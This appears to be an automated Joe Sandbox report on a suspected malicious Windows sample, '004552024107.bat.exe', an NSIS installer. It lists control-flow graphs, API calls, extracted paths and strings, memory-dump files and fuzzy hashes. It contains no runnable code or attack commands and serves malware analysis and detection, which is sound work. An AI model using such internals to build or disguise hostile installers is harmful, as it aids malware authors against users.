                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                        • String ID:
                                        • API String ID: 4154960007-0
                                        • Opcode ID: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                        • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                        • Opcode Fuzzy Hash: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                        • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 516 405a4f-405a75 call 405d0d 519 405a77-405a89 DeleteFileA 516->519 520 405a8e-405a95 516->520 521 405c18-405c1c 519->521 522 405a97-405a99 520->522 523 405aa8-405ab8 call 40628d 520->523 524 405bc6-405bcb 522->524 525 405a9f-405aa2 522->525 529 405ac7-405ac8 call 405c66 523->529 530 405aba-405ac5 lstrcatA 523->530 524->521 528 405bcd-405bd0 524->528 525->523 525->524 531 405bd2-405bd8 528->531 532 405bda-405be2 call 406620 528->532 533 405acd-405ad0 529->533 530->533 531->521 532->521 539 405be4-405bf8 call 405c1f call 405a07 532->539 537 405ad2-405ad9 533->537 538 405adb-405ae1 lstrcatA 533->538 537->538 540 405ae6-405b04 lstrlenA FindFirstFileA 537->540 538->540 554 405c10-405c13 call 4053d1 539->554 555 405bfa-405bfd 539->555 542 405b0a-405b21 call 405c4a 540->542 543 405bbc-405bc0 540->543 550 405b23-405b27 542->550 551 405b2c-405b2f 542->551 543->524 545 405bc2 543->545 545->524 550->551 556 405b29 550->556 552 405b31-405b36 551->552 553 405b42-405b50 call 40628d 551->553 557 405b38-405b3a 552->557 558 405b9b-405bad FindNextFileA 552->558 566 405b52-405b5a 553->566 567 405b67-405b72 call 405a07 553->567 554->521 555->531 560 405bff-405c0e call 4053d1 call 406066 555->560 556->551 557->553 562 405b3c-405b40 557->562 558->542 564 405bb3-405bb6 FindClose 558->564 560->521 562->553 562->558 564->543 566->558 569 405b5c-405b65 call 405a4f 566->569 576 405b93-405b96 call 4053d1 567->576 577 405b74-405b77 567->577 569->558 576->558 579 405b79-405b89 call 4053d1 call 406066 577->579 580 405b8b-405b91 577->580 579->558 580->558
                                        APIs
                                        • DeleteFileA.KERNELBASE(?,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405A78
                                        • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405AC0
                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405AE1
                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405AE7
                                        • FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405AF8
                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                        • FindClose.KERNEL32(00000000), ref: 00405BB6
                                        Strings
                                        • "C:\Users\user\Desktop\004552024107.bat.exe", xrefs: 00405A58
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5C
                                        • \*.*, xrefs: 00405ABA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\004552024107.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                        • API String ID: 2035342205-1528724445
                                        • Opcode ID: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                        • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                        • Opcode Fuzzy Hash: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                        • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                        APIs
                                        • FindFirstFileA.KERNELBASE(757B3410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,757B3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,757B3410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                        • FindClose.KERNEL32(00000000), ref: 00406637
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsr10C0.tmp, xrefs: 00406620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp
                                        • API String ID: 2295610775-1836902777
                                        • Opcode ID: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                        • Instruction ID: 21071efbed15a2f64541de492f8ee2fd881da0b051754d52d90be6cd238fbd17
                                        • Opcode Fuzzy Hash: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                        • Instruction Fuzzy Hash: 08D012355490205BC64017396F0C85BBA599F163717118E37F8A6F12E0CB758C7296DC
                                        APIs
                                        • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A56
                                        • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A69
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: EnvironmentExpandStringslstrcmp
                                        • String ID:
                                        • API String ID: 1938659011-0
                                        • Opcode ID: 1f740ebdafb4e989a716510470814d0f4b96e2deadac2d7748d55cb63aed77a8
                                        • Instruction ID: 106b93b956adcb394031d7b68410eec4a4f19a4829598155c7958b8f8b1c482a
                                        • Opcode Fuzzy Hash: 1f740ebdafb4e989a716510470814d0f4b96e2deadac2d7748d55cb63aed77a8
                                        • Instruction Fuzzy Hash: E8F08231B01201EBCB20CF659E48AAF7EE8DF51354B10403BE145F6190D6788643DF5C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 203 403e33-403e45 204 403e4b-403e51 203->204 205 403fac-403fbb 203->205 204->205 206 403e57-403e60 204->206 207 40400a-40401f 205->207 208 403fbd-404005 GetDlgItem * 2 call 40432d SetClassLongA call 40140b 205->208 212 403e62-403e6f SetWindowPos 206->212 213 403e75-403e7c 206->213 210 404021-404024 207->210 211 40405f-404064 call 404379 207->211 208->207 215 404026-404031 call 401389 210->215 216 404057-404059 210->216 225 404069-404084 211->225 212->213 218 403ec0-403ec6 213->218 219 403e7e-403e98 ShowWindow 213->219 215->216 242 404033-404052 SendMessageA 215->242 216->211 224 4042fa 216->224 221 403ec8-403eda DestroyWindow 218->221 222 403edf-403ee2 218->222 226 403f99-403fa7 call 404394 219->226 227 403e9e-403eb1 GetWindowLongA 219->227 230 4042d7-4042dd 221->230 232 403ee4-403ef0 SetWindowLongA 222->232 233 403ef5-403efb 222->233 231 4042fc-404303 224->231 236 404086-404088 call 40140b 225->236 237 40408d-404093 225->237 226->231 227->226 228 403eb7-403eba ShowWindow 227->228 228->218 230->224 238 4042df-4042e5 230->238 232->231 233->226 241 403f01-403f10 GetDlgItem 233->241 236->237 239 4042b8-4042d1 DestroyWindow EndDialog 237->239 240 404099-4040a4 237->240 238->224 245 4042e7-4042f0 ShowWindow 238->245 239->230 240->239 246 4040aa-4040f7 call 406320 call 40432d * 3 GetDlgItem 240->246 247 403f12-403f29 SendMessageA IsWindowEnabled 241->247 248 403f2f-403f32 241->248 242->231 245->224 275 404101-40413d ShowWindow KiUserCallbackDispatcher call 40434f EnableWindow 246->275 276 4040f9-4040fe 246->276 247->224 247->248 250 403f34-403f35 248->250 251 403f37-403f3a 248->251 253 403f65-403f6a call 404306 250->253 254 403f48-403f4d 251->254 255 403f3c-403f42 251->255 253->226 258 403f83-403f93 SendMessageA 254->258 260 403f4f-403f55 254->260 255->258 259 403f44-403f46 255->259 258->226 259->253 263 403f57-403f5d call 40140b 260->263 264 403f6c-403f75 call 40140b 260->264 271 403f63 263->271 264->226 273 403f77-403f81 264->273 271->253 273->271 279 404142 275->279 280 40413f-404140 275->280 276->275 281 404144-404172 GetSystemMenu EnableMenuItem SendMessageA 279->281 280->281 282 404174-404185 SendMessageA 281->282 283 404187 281->283 284 40418d-4041c7 call 404362 call 403e14 call 40628d lstrlenA call 406320 SetWindowTextA call 401389 282->284 283->284 284->225 295 4041cd-4041cf 284->295 295->225 296 4041d5-4041d9 295->296 297 4041f8-40420c DestroyWindow 296->297 298 4041db-4041e1 296->298 297->230 300 404212-40423f CreateDialogParamA 297->300 298->224 299 4041e7-4041ed 298->299 299->225 301 4041f3 299->301 300->230 302 404245-40429c call 40432d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 300->302 301->224 302->224 307 40429e-4042b1 ShowWindow call 404379 302->307 309 4042b6 307->309 309->230
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                        • ShowWindow.USER32(?), ref: 00403E8F
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                                        • ShowWindow.USER32(?,00000004), ref: 00403EBA
                                        • DestroyWindow.USER32 ref: 00403ECE
                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                        • GetDlgItem.USER32(?,?), ref: 00403F06
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                        • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                        • GetDlgItem.USER32(?,?), ref: 00403FCC
                                        • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                        • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00404041
                                        • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                        • ShowWindow.USER32(00000000,?), ref: 00404108
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040411A
                                        • EnableWindow.USER32(?,?), ref: 00404135
                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040414B
                                        • EnableMenuItem.USER32(00000000), ref: 00404152
                                        • SendMessageA.USER32(?,000000F4,00000000,?), ref: 0040416A
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                        • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                        • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                        • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID:
                                        • API String ID: 121052019-0
                                        • Opcode ID: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                        • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                        • Opcode Fuzzy Hash: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                        • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 310 403a96-403aae call 4066b5 313 403ab0-403ac0 call 4061eb 310->313 314 403ac2-403af3 call 406174 310->314 323 403b16-403b3f call 403d5b call 405d0d 313->323 319 403af5-403b06 call 406174 314->319 320 403b0b-403b11 lstrcatA 314->320 319->320 320->323 328 403b45-403b4a 323->328 329 403bc6-403bce call 405d0d 323->329 328->329 330 403b4c-403b70 call 406174 328->330 335 403bd0-403bd7 call 406320 329->335 336 403bdc-403c01 LoadImageA 329->336 330->329 337 403b72-403b74 330->337 335->336 339 403c82-403c8a call 40140b 336->339 340 403c03-403c33 RegisterClassA 336->340 341 403b85-403b91 lstrlenA 337->341 342 403b76-403b83 call 405c4a 337->342 354 403c94-403c9f call 403d5b 339->354 355 403c8c-403c8f 339->355 343 403d51 340->343 344 403c39-403c7d SystemParametersInfoA CreateWindowExA 340->344 348 403b93-403ba1 lstrcmpiA 341->348 349 403bb9-403bc1 call 405c1f call 40628d 341->349 342->341 347 403d53-403d5a 343->347 344->339 348->349 353 403ba3-403bad GetFileAttributesA 348->353 349->329 358 403bb3-403bb4 call 405c66 353->358 359 403baf-403bb1 353->359 363 403ca5-403cbf ShowWindow call 406647 354->363 364 403d28-403d29 call 4054a3 354->364 355->347 358->349 359->349 359->358 371 403cc1-403cc6 call 406647 363->371 372 403ccb-403cdd GetClassInfoA 363->372 367 403d2e-403d30 364->367 369 403d32-403d38 367->369 370 403d4a-403d4c call 40140b 367->370 369->355 373 403d3e-403d45 call 40140b 369->373 370->343 371->372 376 403cf5-403d18 DialogBoxParamA call 40140b 372->376 377 403cdf-403cef GetClassInfoA RegisterClassA 372->377 373->355 381 403d1d-403d26 call 4039e6 376->381 377->376 381->347
                                        APIs
                                          • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                          • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                        • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,757B3410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\004552024107.bat.exe",0000000A,0000000C), ref: 00403B11
                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,757B3410), ref: 00403B86
                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                        • GetFileAttributesA.KERNEL32(Call,?,"C:\Users\user\Desktop\004552024107.bat.exe",0000000A,0000000C), ref: 00403BA4
                                        • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes), ref: 00403BED
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                        • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\004552024107.bat.exe",0000000A,0000000C), ref: 00403CAD
                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                        • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                        • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\004552024107.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 1975747703-407137748
                                        • Opcode ID: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                        • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                        • Opcode Fuzzy Hash: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                        • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 384 402f31-402f7f GetTickCount GetModuleFileNameA call 405e20 387 402f81-402f86 384->387 388 402f8b-402fb9 call 40628d call 405c66 call 40628d GetFileSize 384->388 389 403161-403165 387->389 396 4030a4-4030b2 call 402ecd 388->396 397 402fbf 388->397 404 4030b4-4030b7 396->404 405 403107-40310c 396->405 398 402fc4-402fdb 397->398 400 402fdd 398->400 401 402fdf-402fe8 call 40337a 398->401 400->401 410 40310e-403116 call 402ecd 401->410 411 402fee-402ff5 401->411 406 4030b9-4030d1 call 403390 call 40337a 404->406 407 4030db-403105 GlobalAlloc call 403390 call 403168 404->407 405->389 406->405 430 4030d3-4030d9 406->430 407->405 435 403118-403129 407->435 410->405 414 403071-403075 411->414 415 402ff7-40300b call 405ddb 411->415 419 403077-40307e call 402ecd 414->419 420 40307f-403085 414->420 415->420 433 40300d-403014 415->433 419->420 426 403094-40309c 420->426 427 403087-403091 call 40676c 420->427 426->398 434 4030a2 426->434 427->426 430->405 430->407 433->420 439 403016-40301d 433->439 434->396 436 403131-403136 435->436 437 40312b 435->437 440 403137-40313d 436->440 437->436 439->420 441 40301f-403026 439->441 440->440 442 40313f-40315a SetFilePointer call 405ddb 440->442 441->420 443 403028-40302f 441->443 446 40315f 442->446 443->420 445 403031-403051 443->445 445->405 447 403057-40305b 445->447 446->389 448 403063-40306b 447->448 449 40305d-403061 447->449 448->420 450 40306d-40306f 448->450 449->434 449->448 450->420
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402F42
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\004552024107.bat.exe,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\004552024107.bat.exe,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                        • GlobalAlloc.KERNELBASE(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\004552024107.bat.exe"$8TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\004552024107.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 2803837635-659382110
                                        • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                        • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
